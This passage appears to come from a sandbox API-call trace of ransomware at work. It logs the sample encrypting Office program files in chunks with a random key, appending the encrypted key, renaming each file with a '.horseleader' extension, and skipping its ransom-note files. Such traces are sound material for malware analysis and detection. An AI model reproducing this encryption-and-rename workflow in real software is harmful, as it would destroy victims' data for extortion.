cAlternateFileName="")) returned 1 [0244.128] lstrcmpiW (lpString1="MSOICONS.EXE", lpString2="Windows") returned -1 [0244.128] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 72 [0244.128] StrStrIW (lpFirst="MSOICONS.EXE", lpSrch=".horseleader") returned 0x0 [0244.128] lstrcmpW (lpString1="MSOICONS.EXE", lpString2="#Decrypt#.txt") returned 1 [0244.128] lstrcmpW (lpString1="MSOICONS.EXE", lpString2="_uninstalling_.png") returned 1 [0244.128] lstrlenW (lpString=".testttjffg") returned 11 [0244.128] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE", lpSrch=".testttjffg") returned 0x0 [0244.129] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.129] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.129] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 72 [0244.131] StrStrW (lpFirst="MSOICONS.EXE", lpSrch=".txt") returned 0x0 [0244.131] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=473952) returned 1 [0244.131] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.131] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.135] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.135] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.136] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x375b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.136] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.138] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.138] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.139] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x6eb60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.139] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.142] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.143] CloseHandle (hObject=0x158) returned 1 [0244.143] GetProcessHeap () returned 0x780000 [0244.143] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.144] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE.horseleader") returned 84 [0244.144] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe.horseleader")) returned 1 [0244.145] GetProcessHeap () returned 0x780000 [0244.145] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.145] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e15000, ftCreationTime.dwHighDateTime=0x1cbf3e5, ftLastAccessTime.dwLowDateTime=0xec32f3e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe5e15000, ftLastWriteTime.dwHighDateTime=0x1cbf3e5, nFileSizeHigh=0x0, nFileSizeLow=0x4529780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSORES.DLL", cAlternateFileName="")) returned 1 [0244.145] lstrcmpiW (lpString1="MSORES.DLL", lpString2="Windows") returned -1 [0244.145] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL") returned 70 [0244.146] StrStrIW (lpFirst="MSORES.DLL", lpSrch=".horseleader") returned 0x0 [0244.146] lstrcmpW (lpString1="MSORES.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.146] lstrcmpW (lpString1="MSORES.DLL", lpString2="_uninstalling_.png") returned 1 [0244.146] lstrlenW (lpString=".testttjffg") returned 11 [0244.146] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL", lpSrch=".testttjffg") returned 0x0 [0244.146] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.146] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.146] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.147] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL") returned 70 [0244.147] StrStrW (lpFirst="MSORES.DLL", lpSrch=".txt") returned 0x0 [0244.147] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=72521600) returned 1 [0244.147] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.148] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.157] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.158] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x22923c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.158] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.160] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.160] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4524780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.161] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.164] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.164] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.164] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.164] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.164] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.164] CloseHandle (hObject=0x158) returned 1 [0244.165] GetProcessHeap () returned 0x780000 [0244.165] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 
[0244.165] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.horseleader") returned 82 [0244.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.horseleader")) returned 1 [0244.166] GetProcessHeap () returned 0x780000 [0244.166] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.166] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4293d00, ftCreationTime.dwHighDateTime=0x1cbc468, ftLastAccessTime.dwLowDateTime=0xd77dddc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa4293d00, ftLastWriteTime.dwHighDateTime=0x1cbc468, nFileSizeHigh=0x0, nFileSizeLow=0x135f90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msoshext.dll", cAlternateFileName="")) returned 1 [0244.166] lstrcmpiW (lpString1="msoshext.dll", lpString2="Windows") returned -1 [0244.166] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 72 [0244.167] StrStrIW (lpFirst="msoshext.dll", lpSrch=".horseleader") returned 0x0 [0244.167] lstrcmpW (lpString1="msoshext.dll", lpString2="#Decrypt#.txt") returned 1 [0244.167] lstrcmpW (lpString1="msoshext.dll", lpString2="_uninstalling_.png") returned 1 [0244.167] lstrlenW (lpString=".testttjffg") returned 11 [0244.167] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll", 
lpSrch=".testttjffg") returned 0x0 [0244.167] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.167] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.167] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.168] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 72 [0244.168] StrStrW (lpFirst="msoshext.dll", lpSrch=".txt") returned 0x0 [0244.168] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1269648) returned 1 [0244.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.168] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.172] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.173] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.173] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x987c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.173] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.181] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.181] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.181] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x130f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.181] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, 
lpOverlapped=0x0) returned 1 [0244.193] CloseHandle (hObject=0x158) returned 1 [0244.194] GetProcessHeap () returned 0x780000 [0244.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.194] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll.horseleader") returned 84 [0244.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll.horseleader")) returned 1 [0244.196] GetProcessHeap () returned 0x780000 [0244.196] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.196] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc276d800, ftCreationTime.dwHighDateTime=0x1cab8aa, ftLastAccessTime.dwLowDateTime=0x6a050eb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc276d800, ftLastWriteTime.dwHighDateTime=0x1cab8aa, nFileSizeHigh=0x0, nFileSizeLow=0xdb50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOXEV.DLL", cAlternateFileName="")) returned 1 [0244.196] lstrcmpiW (lpString1="MSOXEV.DLL", lpString2="Windows") returned -1 [0244.196] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL") returned 70 [0244.196] StrStrIW (lpFirst="MSOXEV.DLL", lpSrch=".horseleader") returned 0x0 [0244.196] lstrcmpW (lpString1="MSOXEV.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.196] lstrcmpW (lpString1="MSOXEV.DLL", 
lpString2="_uninstalling_.png") returned 1 [0244.196] lstrlenW (lpString=".testttjffg") returned 11 [0244.196] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL", lpSrch=".testttjffg") returned 0x0 [0244.196] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.196] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL") returned 70 [0244.198] StrStrW (lpFirst="MSOXEV.DLL", lpSrch=".txt") returned 0x0 [0244.198] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=56144) returned 1 [0244.198] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.201] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.201] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.202] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.202] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.202] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3b50, lpOverlapped=0x0) returned 1 [0244.203] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc4b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.203] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3b50, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3b50, lpOverlapped=0x0) returned 1 [0244.203] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.203] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.203] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.203] CloseHandle (hObject=0x158) returned 1 [0244.203] GetProcessHeap () returned 0x780000 [0244.203] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.204] wnsprintfW (in: 
pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.horseleader") returned 82 [0244.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll.horseleader")) returned 1 [0244.205] GetProcessHeap () returned 0x780000 [0244.205] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.205] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x1d950, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOXMLED.EXE", cAlternateFileName="")) returned 1 [0244.205] lstrcmpiW (lpString1="MSOXMLED.EXE", lpString2="Windows") returned -1 [0244.205] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE") returned 72 [0244.205] StrStrIW (lpFirst="MSOXMLED.EXE", lpSrch=".horseleader") returned 0x0 [0244.205] lstrcmpW (lpString1="MSOXMLED.EXE", 